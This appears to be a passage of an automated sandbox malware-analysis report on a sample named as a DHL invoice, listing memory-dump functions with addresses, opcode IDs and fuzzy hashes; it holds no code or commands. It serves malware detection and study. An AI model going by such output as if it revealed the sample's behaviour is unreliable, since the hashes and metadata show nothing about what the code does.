Instruction Fuzzy Hash: 7B51E374E05209CFDB18CFA9C984A9DBBF2FF89304F20942AD809AB361DB709941DF44

Function 05C179E9 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950670c689b77495cd2f6f8d0b3ed9ccff77312a36bd9ca3b7a6c371c6681f51
Instruction ID: 4dd4946a565b03793f759e543bdd530d1d0d61954ed5134309541a515460c972
Opcode Fuzzy Hash: 950670c689b77495cd2f6f8d0b3ed9ccff77312a36bd9ca3b7a6c371c6681f51
Instruction Fuzzy Hash: 4341B474E05208CFDB18DFB9C984A9DBBF2BF89304F249569D819AB361DB719942CF10

Function 05C2EBF0 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b6857a64e2f88b88a7c9e9b83cd4c552fe06f0ab9f4d7498064011615675cf4
Instruction ID: 8c6a94803889202122bc9dbc07ab9e5d89dc7627c4624265de1a3927557c3f1d
Opcode Fuzzy Hash: 7b6857a64e2f88b88a7c9e9b83cd4c552fe06f0ab9f4d7498064011615675cf4
Instruction Fuzzy Hash: B131D536A101149FCB05DF99D888EA9BBB6FF48320F1684A8F509AB372D731ED55DB40

Function 05C23CA8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 493091a09ebe42288457e0f7b4689041ec8a378d55751d6e00e72fb234c5b183
Instruction ID: 937526d38839e65c2a0d25ec3d11b93f4e15f84c0f1c20af5f1ed9148e84ee9e
Opcode Fuzzy Hash: 493091a09ebe42288457e0f7b4689041ec8a378d55751d6e00e72fb234c5b183
Instruction Fuzzy Hash: 3E418F31A103658FCB14CFA5C884ABEBBB6FF84B01F108D2AD516D7290D738DA45CB91

Function 00A512B4 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b94455d6079cbab7aee38943fd74b49365705849d24de7ae22777409e8b7b0
Instruction ID: cb455c49c4c9f2b07a0de4d94efb23c97ff0182525f786ba1f382b97ce36387d
Opcode Fuzzy Hash: b8b94455d6079cbab7aee38943fd74b49365705849d24de7ae22777409e8b7b0
Instruction Fuzzy Hash: 423137B0D002489FCB14DFA9C990AEEBBF5BF48314F248429E948AB250DB759945CFA4

Function 05C1FDB8 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bc086f4f5df7c8a1f51495c670e0265deb66a5bf9267e53406a5a9383b9ae77
Instruction ID: 257028245b7c8768fdccf37a993474611806a6fdfe16e41586862e3291c6d5bc
Opcode Fuzzy Hash: 2bc086f4f5df7c8a1f51495c670e0265deb66a5bf9267e53406a5a9383b9ae77
Instruction Fuzzy Hash: 6B313874E04209CFDB14DFAAC480AAEBBF6BF8A300F10C469D815A7354DB349A459F65

Function 05C2CDB8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85af3d4ef154a22cd2b0b6f8409f35f408f27c0fc5b9742db5ea50a882abda25
Instruction ID: cac568a92093ab5fcb4b5a75fa375a1e8ef8095c6ac4c43e51493a6806a44c3c
Opcode Fuzzy Hash: 85af3d4ef154a22cd2b0b6f8409f35f408f27c0fc5b9742db5ea50a882abda25
Instruction Fuzzy Hash: 2721F8323096509FD3259B6DE84466ABBA5EFC1315B1988BAD00EC7252DB31EC41C790

Function 05C262BA Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ee00cbbc4bedf4a5a39454cd02430b2af05f1aa819490afe41c3a7fc108e175
Instruction ID: aa1224c075ed09b8a8dc45b6e217d92079e5f8fbf1b13c849ff09e591b2652ee
Opcode Fuzzy Hash: 1ee00cbbc4bedf4a5a39454cd02430b2af05f1aa819490afe41c3a7fc108e175
Instruction Fuzzy Hash: 0F3158396107108FC7259F34D89496ABBB6FF85305B10886DE8468B7A0DF31E986CF60

Function 00A512C0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22b1227c7dffa463d12821175e0c275a99e802cb167cfe41f64b73cd33ab653e
Instruction ID: 93e3cbcbd40a6cbd8d0e6be0270e623d8d7715f7d944e3386d9e32ed7eb64739
Opcode Fuzzy Hash: 22b1227c7dffa463d12821175e0c275a99e802cb167cfe41f64b73cd33ab653e
Instruction Fuzzy Hash: DD3124B0D002589FCB14CFAAC590AEEBFF5BF48310F248429E849AB250DB749945CFA0

Function 05C21EE8 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad60d7daf060736daca9bcb8fdf9d3b06e5e5f0a4ba68cc9e9e76cd6288d3c2a
Instruction ID: 3ecd20f4a99f8600d5e3db5ec8aafbaac5069bb795e6e5ceac8023994b2584b5
Opcode Fuzzy Hash: ad60d7daf060736daca9bcb8fdf9d3b06e5e5f0a4ba68cc9e9e76cd6288d3c2a
Instruction Fuzzy Hash: BB21D3767042258FCB209B68D848A7ABBB6FF84310B14492AF51ACB355DF34DD018B90

Function 05C21DF1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc5f62ebce11050acf6cd6ae7d746b8d0bf13934064269de0f5836be2f81119e
Instruction ID: d61c610dfc3f0d540257ef030f29c69fa4a2210925a918cb214727aaf560e53b
Opcode Fuzzy Hash: dc5f62ebce11050acf6cd6ae7d746b8d0bf13934064269de0f5836be2f81119e
Instruction Fuzzy Hash: F721C7317202059FC710DB68D9467AEBBF6FB88300F008979E00AD7759DF70A94A8B90

Function 05C26130 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4908af1183bc0a78cb1aecaa344799229f352aabda50ca8601f8401159b9ec58
Instruction ID: 78be8dcca3a4cd50b034b7c32667defd5e41a948ae0a3e85b03f831510c0d028
Opcode Fuzzy Hash: 4908af1183bc0a78cb1aecaa344799229f352aabda50ca8601f8401159b9ec58
Instruction Fuzzy Hash: 46214C71E00229DFDF00DE7AC944BAEBBF5AB44240F108466D519D7291EA34EA85CBA1

Function 0098D01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035854451.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98d000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4279d9692c00d834727e196e38649d0f09cb6338f74913a20b2ddb30988849c2
Instruction ID: 8fb6b64e387ec11a2c67af4bde91c5167d372dc03ae3db5685eb8f2973db1b5a
Opcode Fuzzy Hash: 4279d9692c00d834727e196e38649d0f09cb6338f74913a20b2ddb30988849c2
Instruction Fuzzy Hash: 2F212271505240DFDB14EF14DAC4B26BFA9FB84324F20C569E9094B386C33AD84ACBA2

Function 00A5FEE0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695f52dae43f98f2e8bfc00ef6cdb65c10cacd2817b29dc0b10835f13cef9ea6
Instruction ID: 6346ce0c2fc40c0060e9e788babb45bc6ecfd6a6a06d0a829f45996fe15602ed
Opcode Fuzzy Hash: 695f52dae43f98f2e8bfc00ef6cdb65c10cacd2817b29dc0b10835f13cef9ea6
Instruction Fuzzy Hash: 88313970E00219DFCB04EFA8D894AEEBBB6FF49311F10852AE805A7364DB305949CF91

Function 05C2E80A Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49f1c54260a28fa30f869aafe1ab4e16891bc0d940469b899c5409bae70d0d95
Instruction ID: 909573a1cdfc24acf368f3aad8e84d798ff66640adfac1024dd276189c728c32
Opcode Fuzzy Hash: 49f1c54260a28fa30f869aafe1ab4e16891bc0d940469b899c5409bae70d0d95
Instruction Fuzzy Hash: A621C0353081648FDB149F3AC854BBD3F9EBF85611B08846AF896DB3A1CA34CD00DBA0

Function 05C22EF2 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ad46beb77e235de25d6615c2228624bb3a32c7f111a8db4e5a16852f1ee42b4
Instruction ID: 2f0d694e9542d0b5e41bf88e26cdcf3d6866f1d7daa8805a08d064f7037c2b4b
Opcode Fuzzy Hash: 7ad46beb77e235de25d6615c2228624bb3a32c7f111a8db4e5a16852f1ee42b4
Instruction Fuzzy Hash: E7217C39A01119DFCB00DBA8D584ADDBBF6FF88710F24452AF501E7360DB749900DB90

Function 00A51B11 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e3f05990b2c42b5f11a42bd2264df70463c74467c978d0ac893c23f4ab9ad62
Instruction ID: 5769b0b241f61185321d7468b014b2d55b2a243b28b61d9e4808bf80355bd672
Opcode Fuzzy Hash: 6e3f05990b2c42b5f11a42bd2264df70463c74467c978d0ac893c23f4ab9ad62
Instruction Fuzzy Hash: F0213CB0918208DFEB04EFA8D8887BEBBF1FB49306F5580A5D419A3360E7744A84DB01

Function 05C2A258 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 366e5c2ddbe7bec5a47c75fa9fa80e786ff78b109de588874d2997224f78d079
Instruction ID: 6d71087cdc14a43f4134c69c19c2fd4a5d98b9f427ef63313c9542588c1ec526
Opcode Fuzzy Hash: 366e5c2ddbe7bec5a47c75fa9fa80e786ff78b109de588874d2997224f78d079
Instruction Fuzzy Hash: 8521F735A401198FCB14DF94C945ADDB7F2FB48300F6005A4E405AB665CB75AE85CFA0

Function 05C18080 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 446646d9c0af06e3eced2b4d26382925cd62311c081cdea0f8c6a7b884cfbca6
Instruction ID: 66ef887194716cc1e63733eab1dc652f5ea0abfa8cb17346b712bc47e2965976
Opcode Fuzzy Hash: 446646d9c0af06e3eced2b4d26382925cd62311c081cdea0f8c6a7b884cfbca6
Instruction Fuzzy Hash: 9A214C74E0820DDFCB14DFA9D4846AEBBB6BB45300F60C569D805A7350D7349A82DF95

Function 00A51B20 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac320e80a65be344de66340c36666b272c1d6a601ededa3ade09839d0392631
Instruction ID: 5ed04c77387d0a0afdb1c86928e27e3ebc7fb6d9a5128270e784eaf14c2134c9
Opcode Fuzzy Hash: dac320e80a65be344de66340c36666b272c1d6a601ededa3ade09839d0392631
Instruction Fuzzy Hash: 1121FFB0908208DFDB44EFA9D4887BDBBF1FB59306F56C4A5D819A3351E7744A88DB01

Function 0098D006 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035854451.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98d000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95a418c59dc185f5eb52964804b6a8af75e22175c095de8d9b3726cda9605365
Instruction ID: ee39112abd508cc9928ea78f1ae6b63ce9c292db95870be068d0bc3735b735f7
Opcode Fuzzy Hash: 95a418c59dc185f5eb52964804b6a8af75e22175c095de8d9b3726cda9605365
Instruction Fuzzy Hash: AA21807550A3C08FCB12DF24D994716BF71EB86314F2981DAD8458B697C33AD81ACB62

Function 05C256A0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5750aaa69faa5d3d10f34ea807b138cce0ee410a10d1d3c707d42c9a451106dc
Instruction ID: 0bc3059ea87e401f9ccd14f28400afccde02449e559b8708a2afff10b953926c
Opcode Fuzzy Hash: 5750aaa69faa5d3d10f34ea807b138cce0ee410a10d1d3c707d42c9a451106dc
Instruction Fuzzy Hash: 2211A5307092949FC705DB69C49096E7BB6AFD674172580EAE009CF362DE31ED06DBA1

Function 05C22FA1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51445277545354031f6648262bfbd09353caaab9c7d14f96058e83eeef91d479
Instruction ID: 3441f84538545f668a5941531ee495c0c27ee6521036365cf9caa16c7967d1c7
Opcode Fuzzy Hash: 51445277545354031f6648262bfbd09353caaab9c7d14f96058e83eeef91d479
Instruction Fuzzy Hash: 7D218078A42269AFCB14CF68D594EADBBF2BF49700F104454F902AB360CB34AD41DF50

Function 05C23230 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e24772bb9d1321f4daea15fed8e380007f6586c8c5822e356b8575f031f1de3
Instruction ID: a245425123f0962650d4ff2185dd7fae94fd376176a0820092a4c05d951f82fd
Opcode Fuzzy Hash: 6e24772bb9d1321f4daea15fed8e380007f6586c8c5822e356b8575f031f1de3
Instruction Fuzzy Hash: 1511A035B002549FCB60DB6998457BA7BF2FB88A01F144829E906D7380DF35D902CFA0

Function 05C17120 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac5609702313540b744779fb3b792001ecc51cedff35000ef5ee63b80e713c99
Instruction ID: 975b24b03b6fe5fc111a12355f8b6f0ae2ff44dc2642eef026397450d103e494
Opcode Fuzzy Hash: ac5609702313540b744779fb3b792001ecc51cedff35000ef5ee63b80e713c99
Instruction Fuzzy Hash: 66212970E05218DFDB18CF6AD844BD9BAF6FB8A300F1480AAE85DA7250CB700984DF05

Function 05C23ED0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd12fdfbf4856fcdb230ba9c0134a202dac46d13cfcb2d780678c7a6fb457605
Instruction ID: 6ae342266cd14046105905d17b17ba4f94de16fd7f606a80cee472c3f43b374a
Opcode Fuzzy Hash: cd12fdfbf4856fcdb230ba9c0134a202dac46d13cfcb2d780678c7a6fb457605
Instruction Fuzzy Hash: 6101F5336082A86FD754CA98E044AEABFF4FB44720F2488EBF584DB250D635EA80C750

Function 05C20B00 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cfaf2203f391ca5bb8ab4ad3032d319e6795a6b9f6818d30d66772cf650d2ba
Instruction ID: d1505198f4779e9f08ce2d9ba3a1f91883e52c39ada5ec0a1593f3dacc679e21
Opcode Fuzzy Hash: 6cfaf2203f391ca5bb8ab4ad3032d319e6795a6b9f6818d30d66772cf650d2ba
Instruction Fuzzy Hash: 0C01287490D208EFC711DFA4D84469DBFB4EB47300F2194DBE844A7361EA719B01DBA1

Function 05C23227 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 681694ac24cea40716979d529ee4c8509d790bd79a3020cbc036d02e229660b8
Instruction ID: b471ff5f46e1638894f1bc95ceb03904187b27665aabf2d2eafae2d00276c998
Opcode Fuzzy Hash: 681694ac24cea40716979d529ee4c8509d790bd79a3020cbc036d02e229660b8
Instruction Fuzzy Hash: 57117035B002559FDB60CB6898467B97BF2BB48A01F14486AE916D7281DB35D902CFA0

Function 05C22E80 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b541872fc7c39239e7a9983f4fc2fc70806204e3515e3bfdd2cdc6d3684a4556
Instruction ID: 24fae03d5497cd216c1117450db334ec1ba33cc42bb4bc09dfed90ef93effb95
Opcode Fuzzy Hash: b541872fc7c39239e7a9983f4fc2fc70806204e3515e3bfdd2cdc6d3684a4556
Instruction Fuzzy Hash: 4801AC3A340314AFD7108F59DC84F9B77A9FB89721F108026FA04CB290CB71D8109B50

Function 00A517AF Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fb90e5d904e065c5ba453ceb1667397b298a8583e276bd19a3b2126af2b2ab
Instruction ID: 355ac9f974cf0a780942d5a00ec51c3913363629ba5c23a20b0bd4b9e51a763a
Opcode Fuzzy Hash: 77fb90e5d904e065c5ba453ceb1667397b298a8583e276bd19a3b2126af2b2ab
Instruction Fuzzy Hash: 9B01A4225496E14FE702AB3C98795E63FA09E5722470E00F3D484CF277E91A8C4AC7D2

Function 0624ED20 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a04cc2353072ce091f5b338e07fd66ddf44b74447b4cb06af2e37b31ec6f1c7
Instruction ID: 4a9c3e570986d598179b305d373fd0fabbe0002a4b8954e76da1319ec8037aae
Opcode Fuzzy Hash: 9a04cc2353072ce091f5b338e07fd66ddf44b74447b4cb06af2e37b31ec6f1c7
Instruction Fuzzy Hash: 9311B7B4E002099FDB48DFA9C9457AEFBF5BF88300F2084699418A7354DA319A419B91

Function 05C22299 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 495b5e54ff6f0ad2aa05142776a27f0ad2d83cad9f65fc4088d636f337663418
Instruction ID: 6cd716f82f97f1539a241fa60b332074d416603229d8e0042ec7e51d141ec3b0
Opcode Fuzzy Hash: 495b5e54ff6f0ad2aa05142776a27f0ad2d83cad9f65fc4088d636f337663418
Instruction Fuzzy Hash: 42F04676B083105FD3154759E81076ABBBAFFCB320F16446AE949DB391CA67AC418BA0

Function 0097D76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035800022.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610146afcf536581ffa3108f76402b4320dd336cff437c03a097fd14b3ee2ae7
Instruction ID: e61f2b67b66220b1466be0db196e0f68be1e71a2bcf7eafad875711d0fecffc8
Opcode Fuzzy Hash: 610146afcf536581ffa3108f76402b4320dd336cff437c03a097fd14b3ee2ae7
Instruction Fuzzy Hash: 4001A7B200A3449AE7144A15D9C4767FFECEF51764F18C529ED0D4A186D379D840CA71

Function 05C2C008 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dbc0cdd36f24ae41855406be990f57079e144d19d9ca482c6157585e8fbab88
Instruction ID: e5b7392bf322f1276f8cdf8af733718691f7e8e096818c5c9cbe8c80ebb5b737
Opcode Fuzzy Hash: 3dbc0cdd36f24ae41855406be990f57079e144d19d9ca482c6157585e8fbab88
Instruction Fuzzy Hash: 6A01F9377100189FC7149B29D8459ADB7AAEFC4224B0440B6ED19C7320DA30DD13CB91

Function 05C1996A Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce016079b986fee7d6d9e45ce1b8e591ce43996b82daa82114a7cb4aa1ae4303
Instruction ID: 91cdc2ec7d63dfe93d3f6f074a3ce267a902e2d1391f6f3ade44d0005ac02e2b
Opcode Fuzzy Hash: ce016079b986fee7d6d9e45ce1b8e591ce43996b82daa82114a7cb4aa1ae4303
Instruction Fuzzy Hash: E111F8749086188FDB64DF24DC54AAABBF2BF4A301F4455EA980EE7361DB315E82CF01

Function 05C18070 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c7eff7e05f2a50d2fed2d6fe632ffc516cb858e2718dde1f3dabdee71ca59e
Instruction ID: 464c435bc96d6fe43dcd7ce49951f041fbfddac10aed92096b727fda03b4dff3
Opcode Fuzzy Hash: 82c7eff7e05f2a50d2fed2d6fe632ffc516cb858e2718dde1f3dabdee71ca59e
Instruction Fuzzy Hash: C50140B4E092098FDB54DFB9C4806AEBFF2FB45300F14956AD409E3351E7344681DB41

Function 05C2F621 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
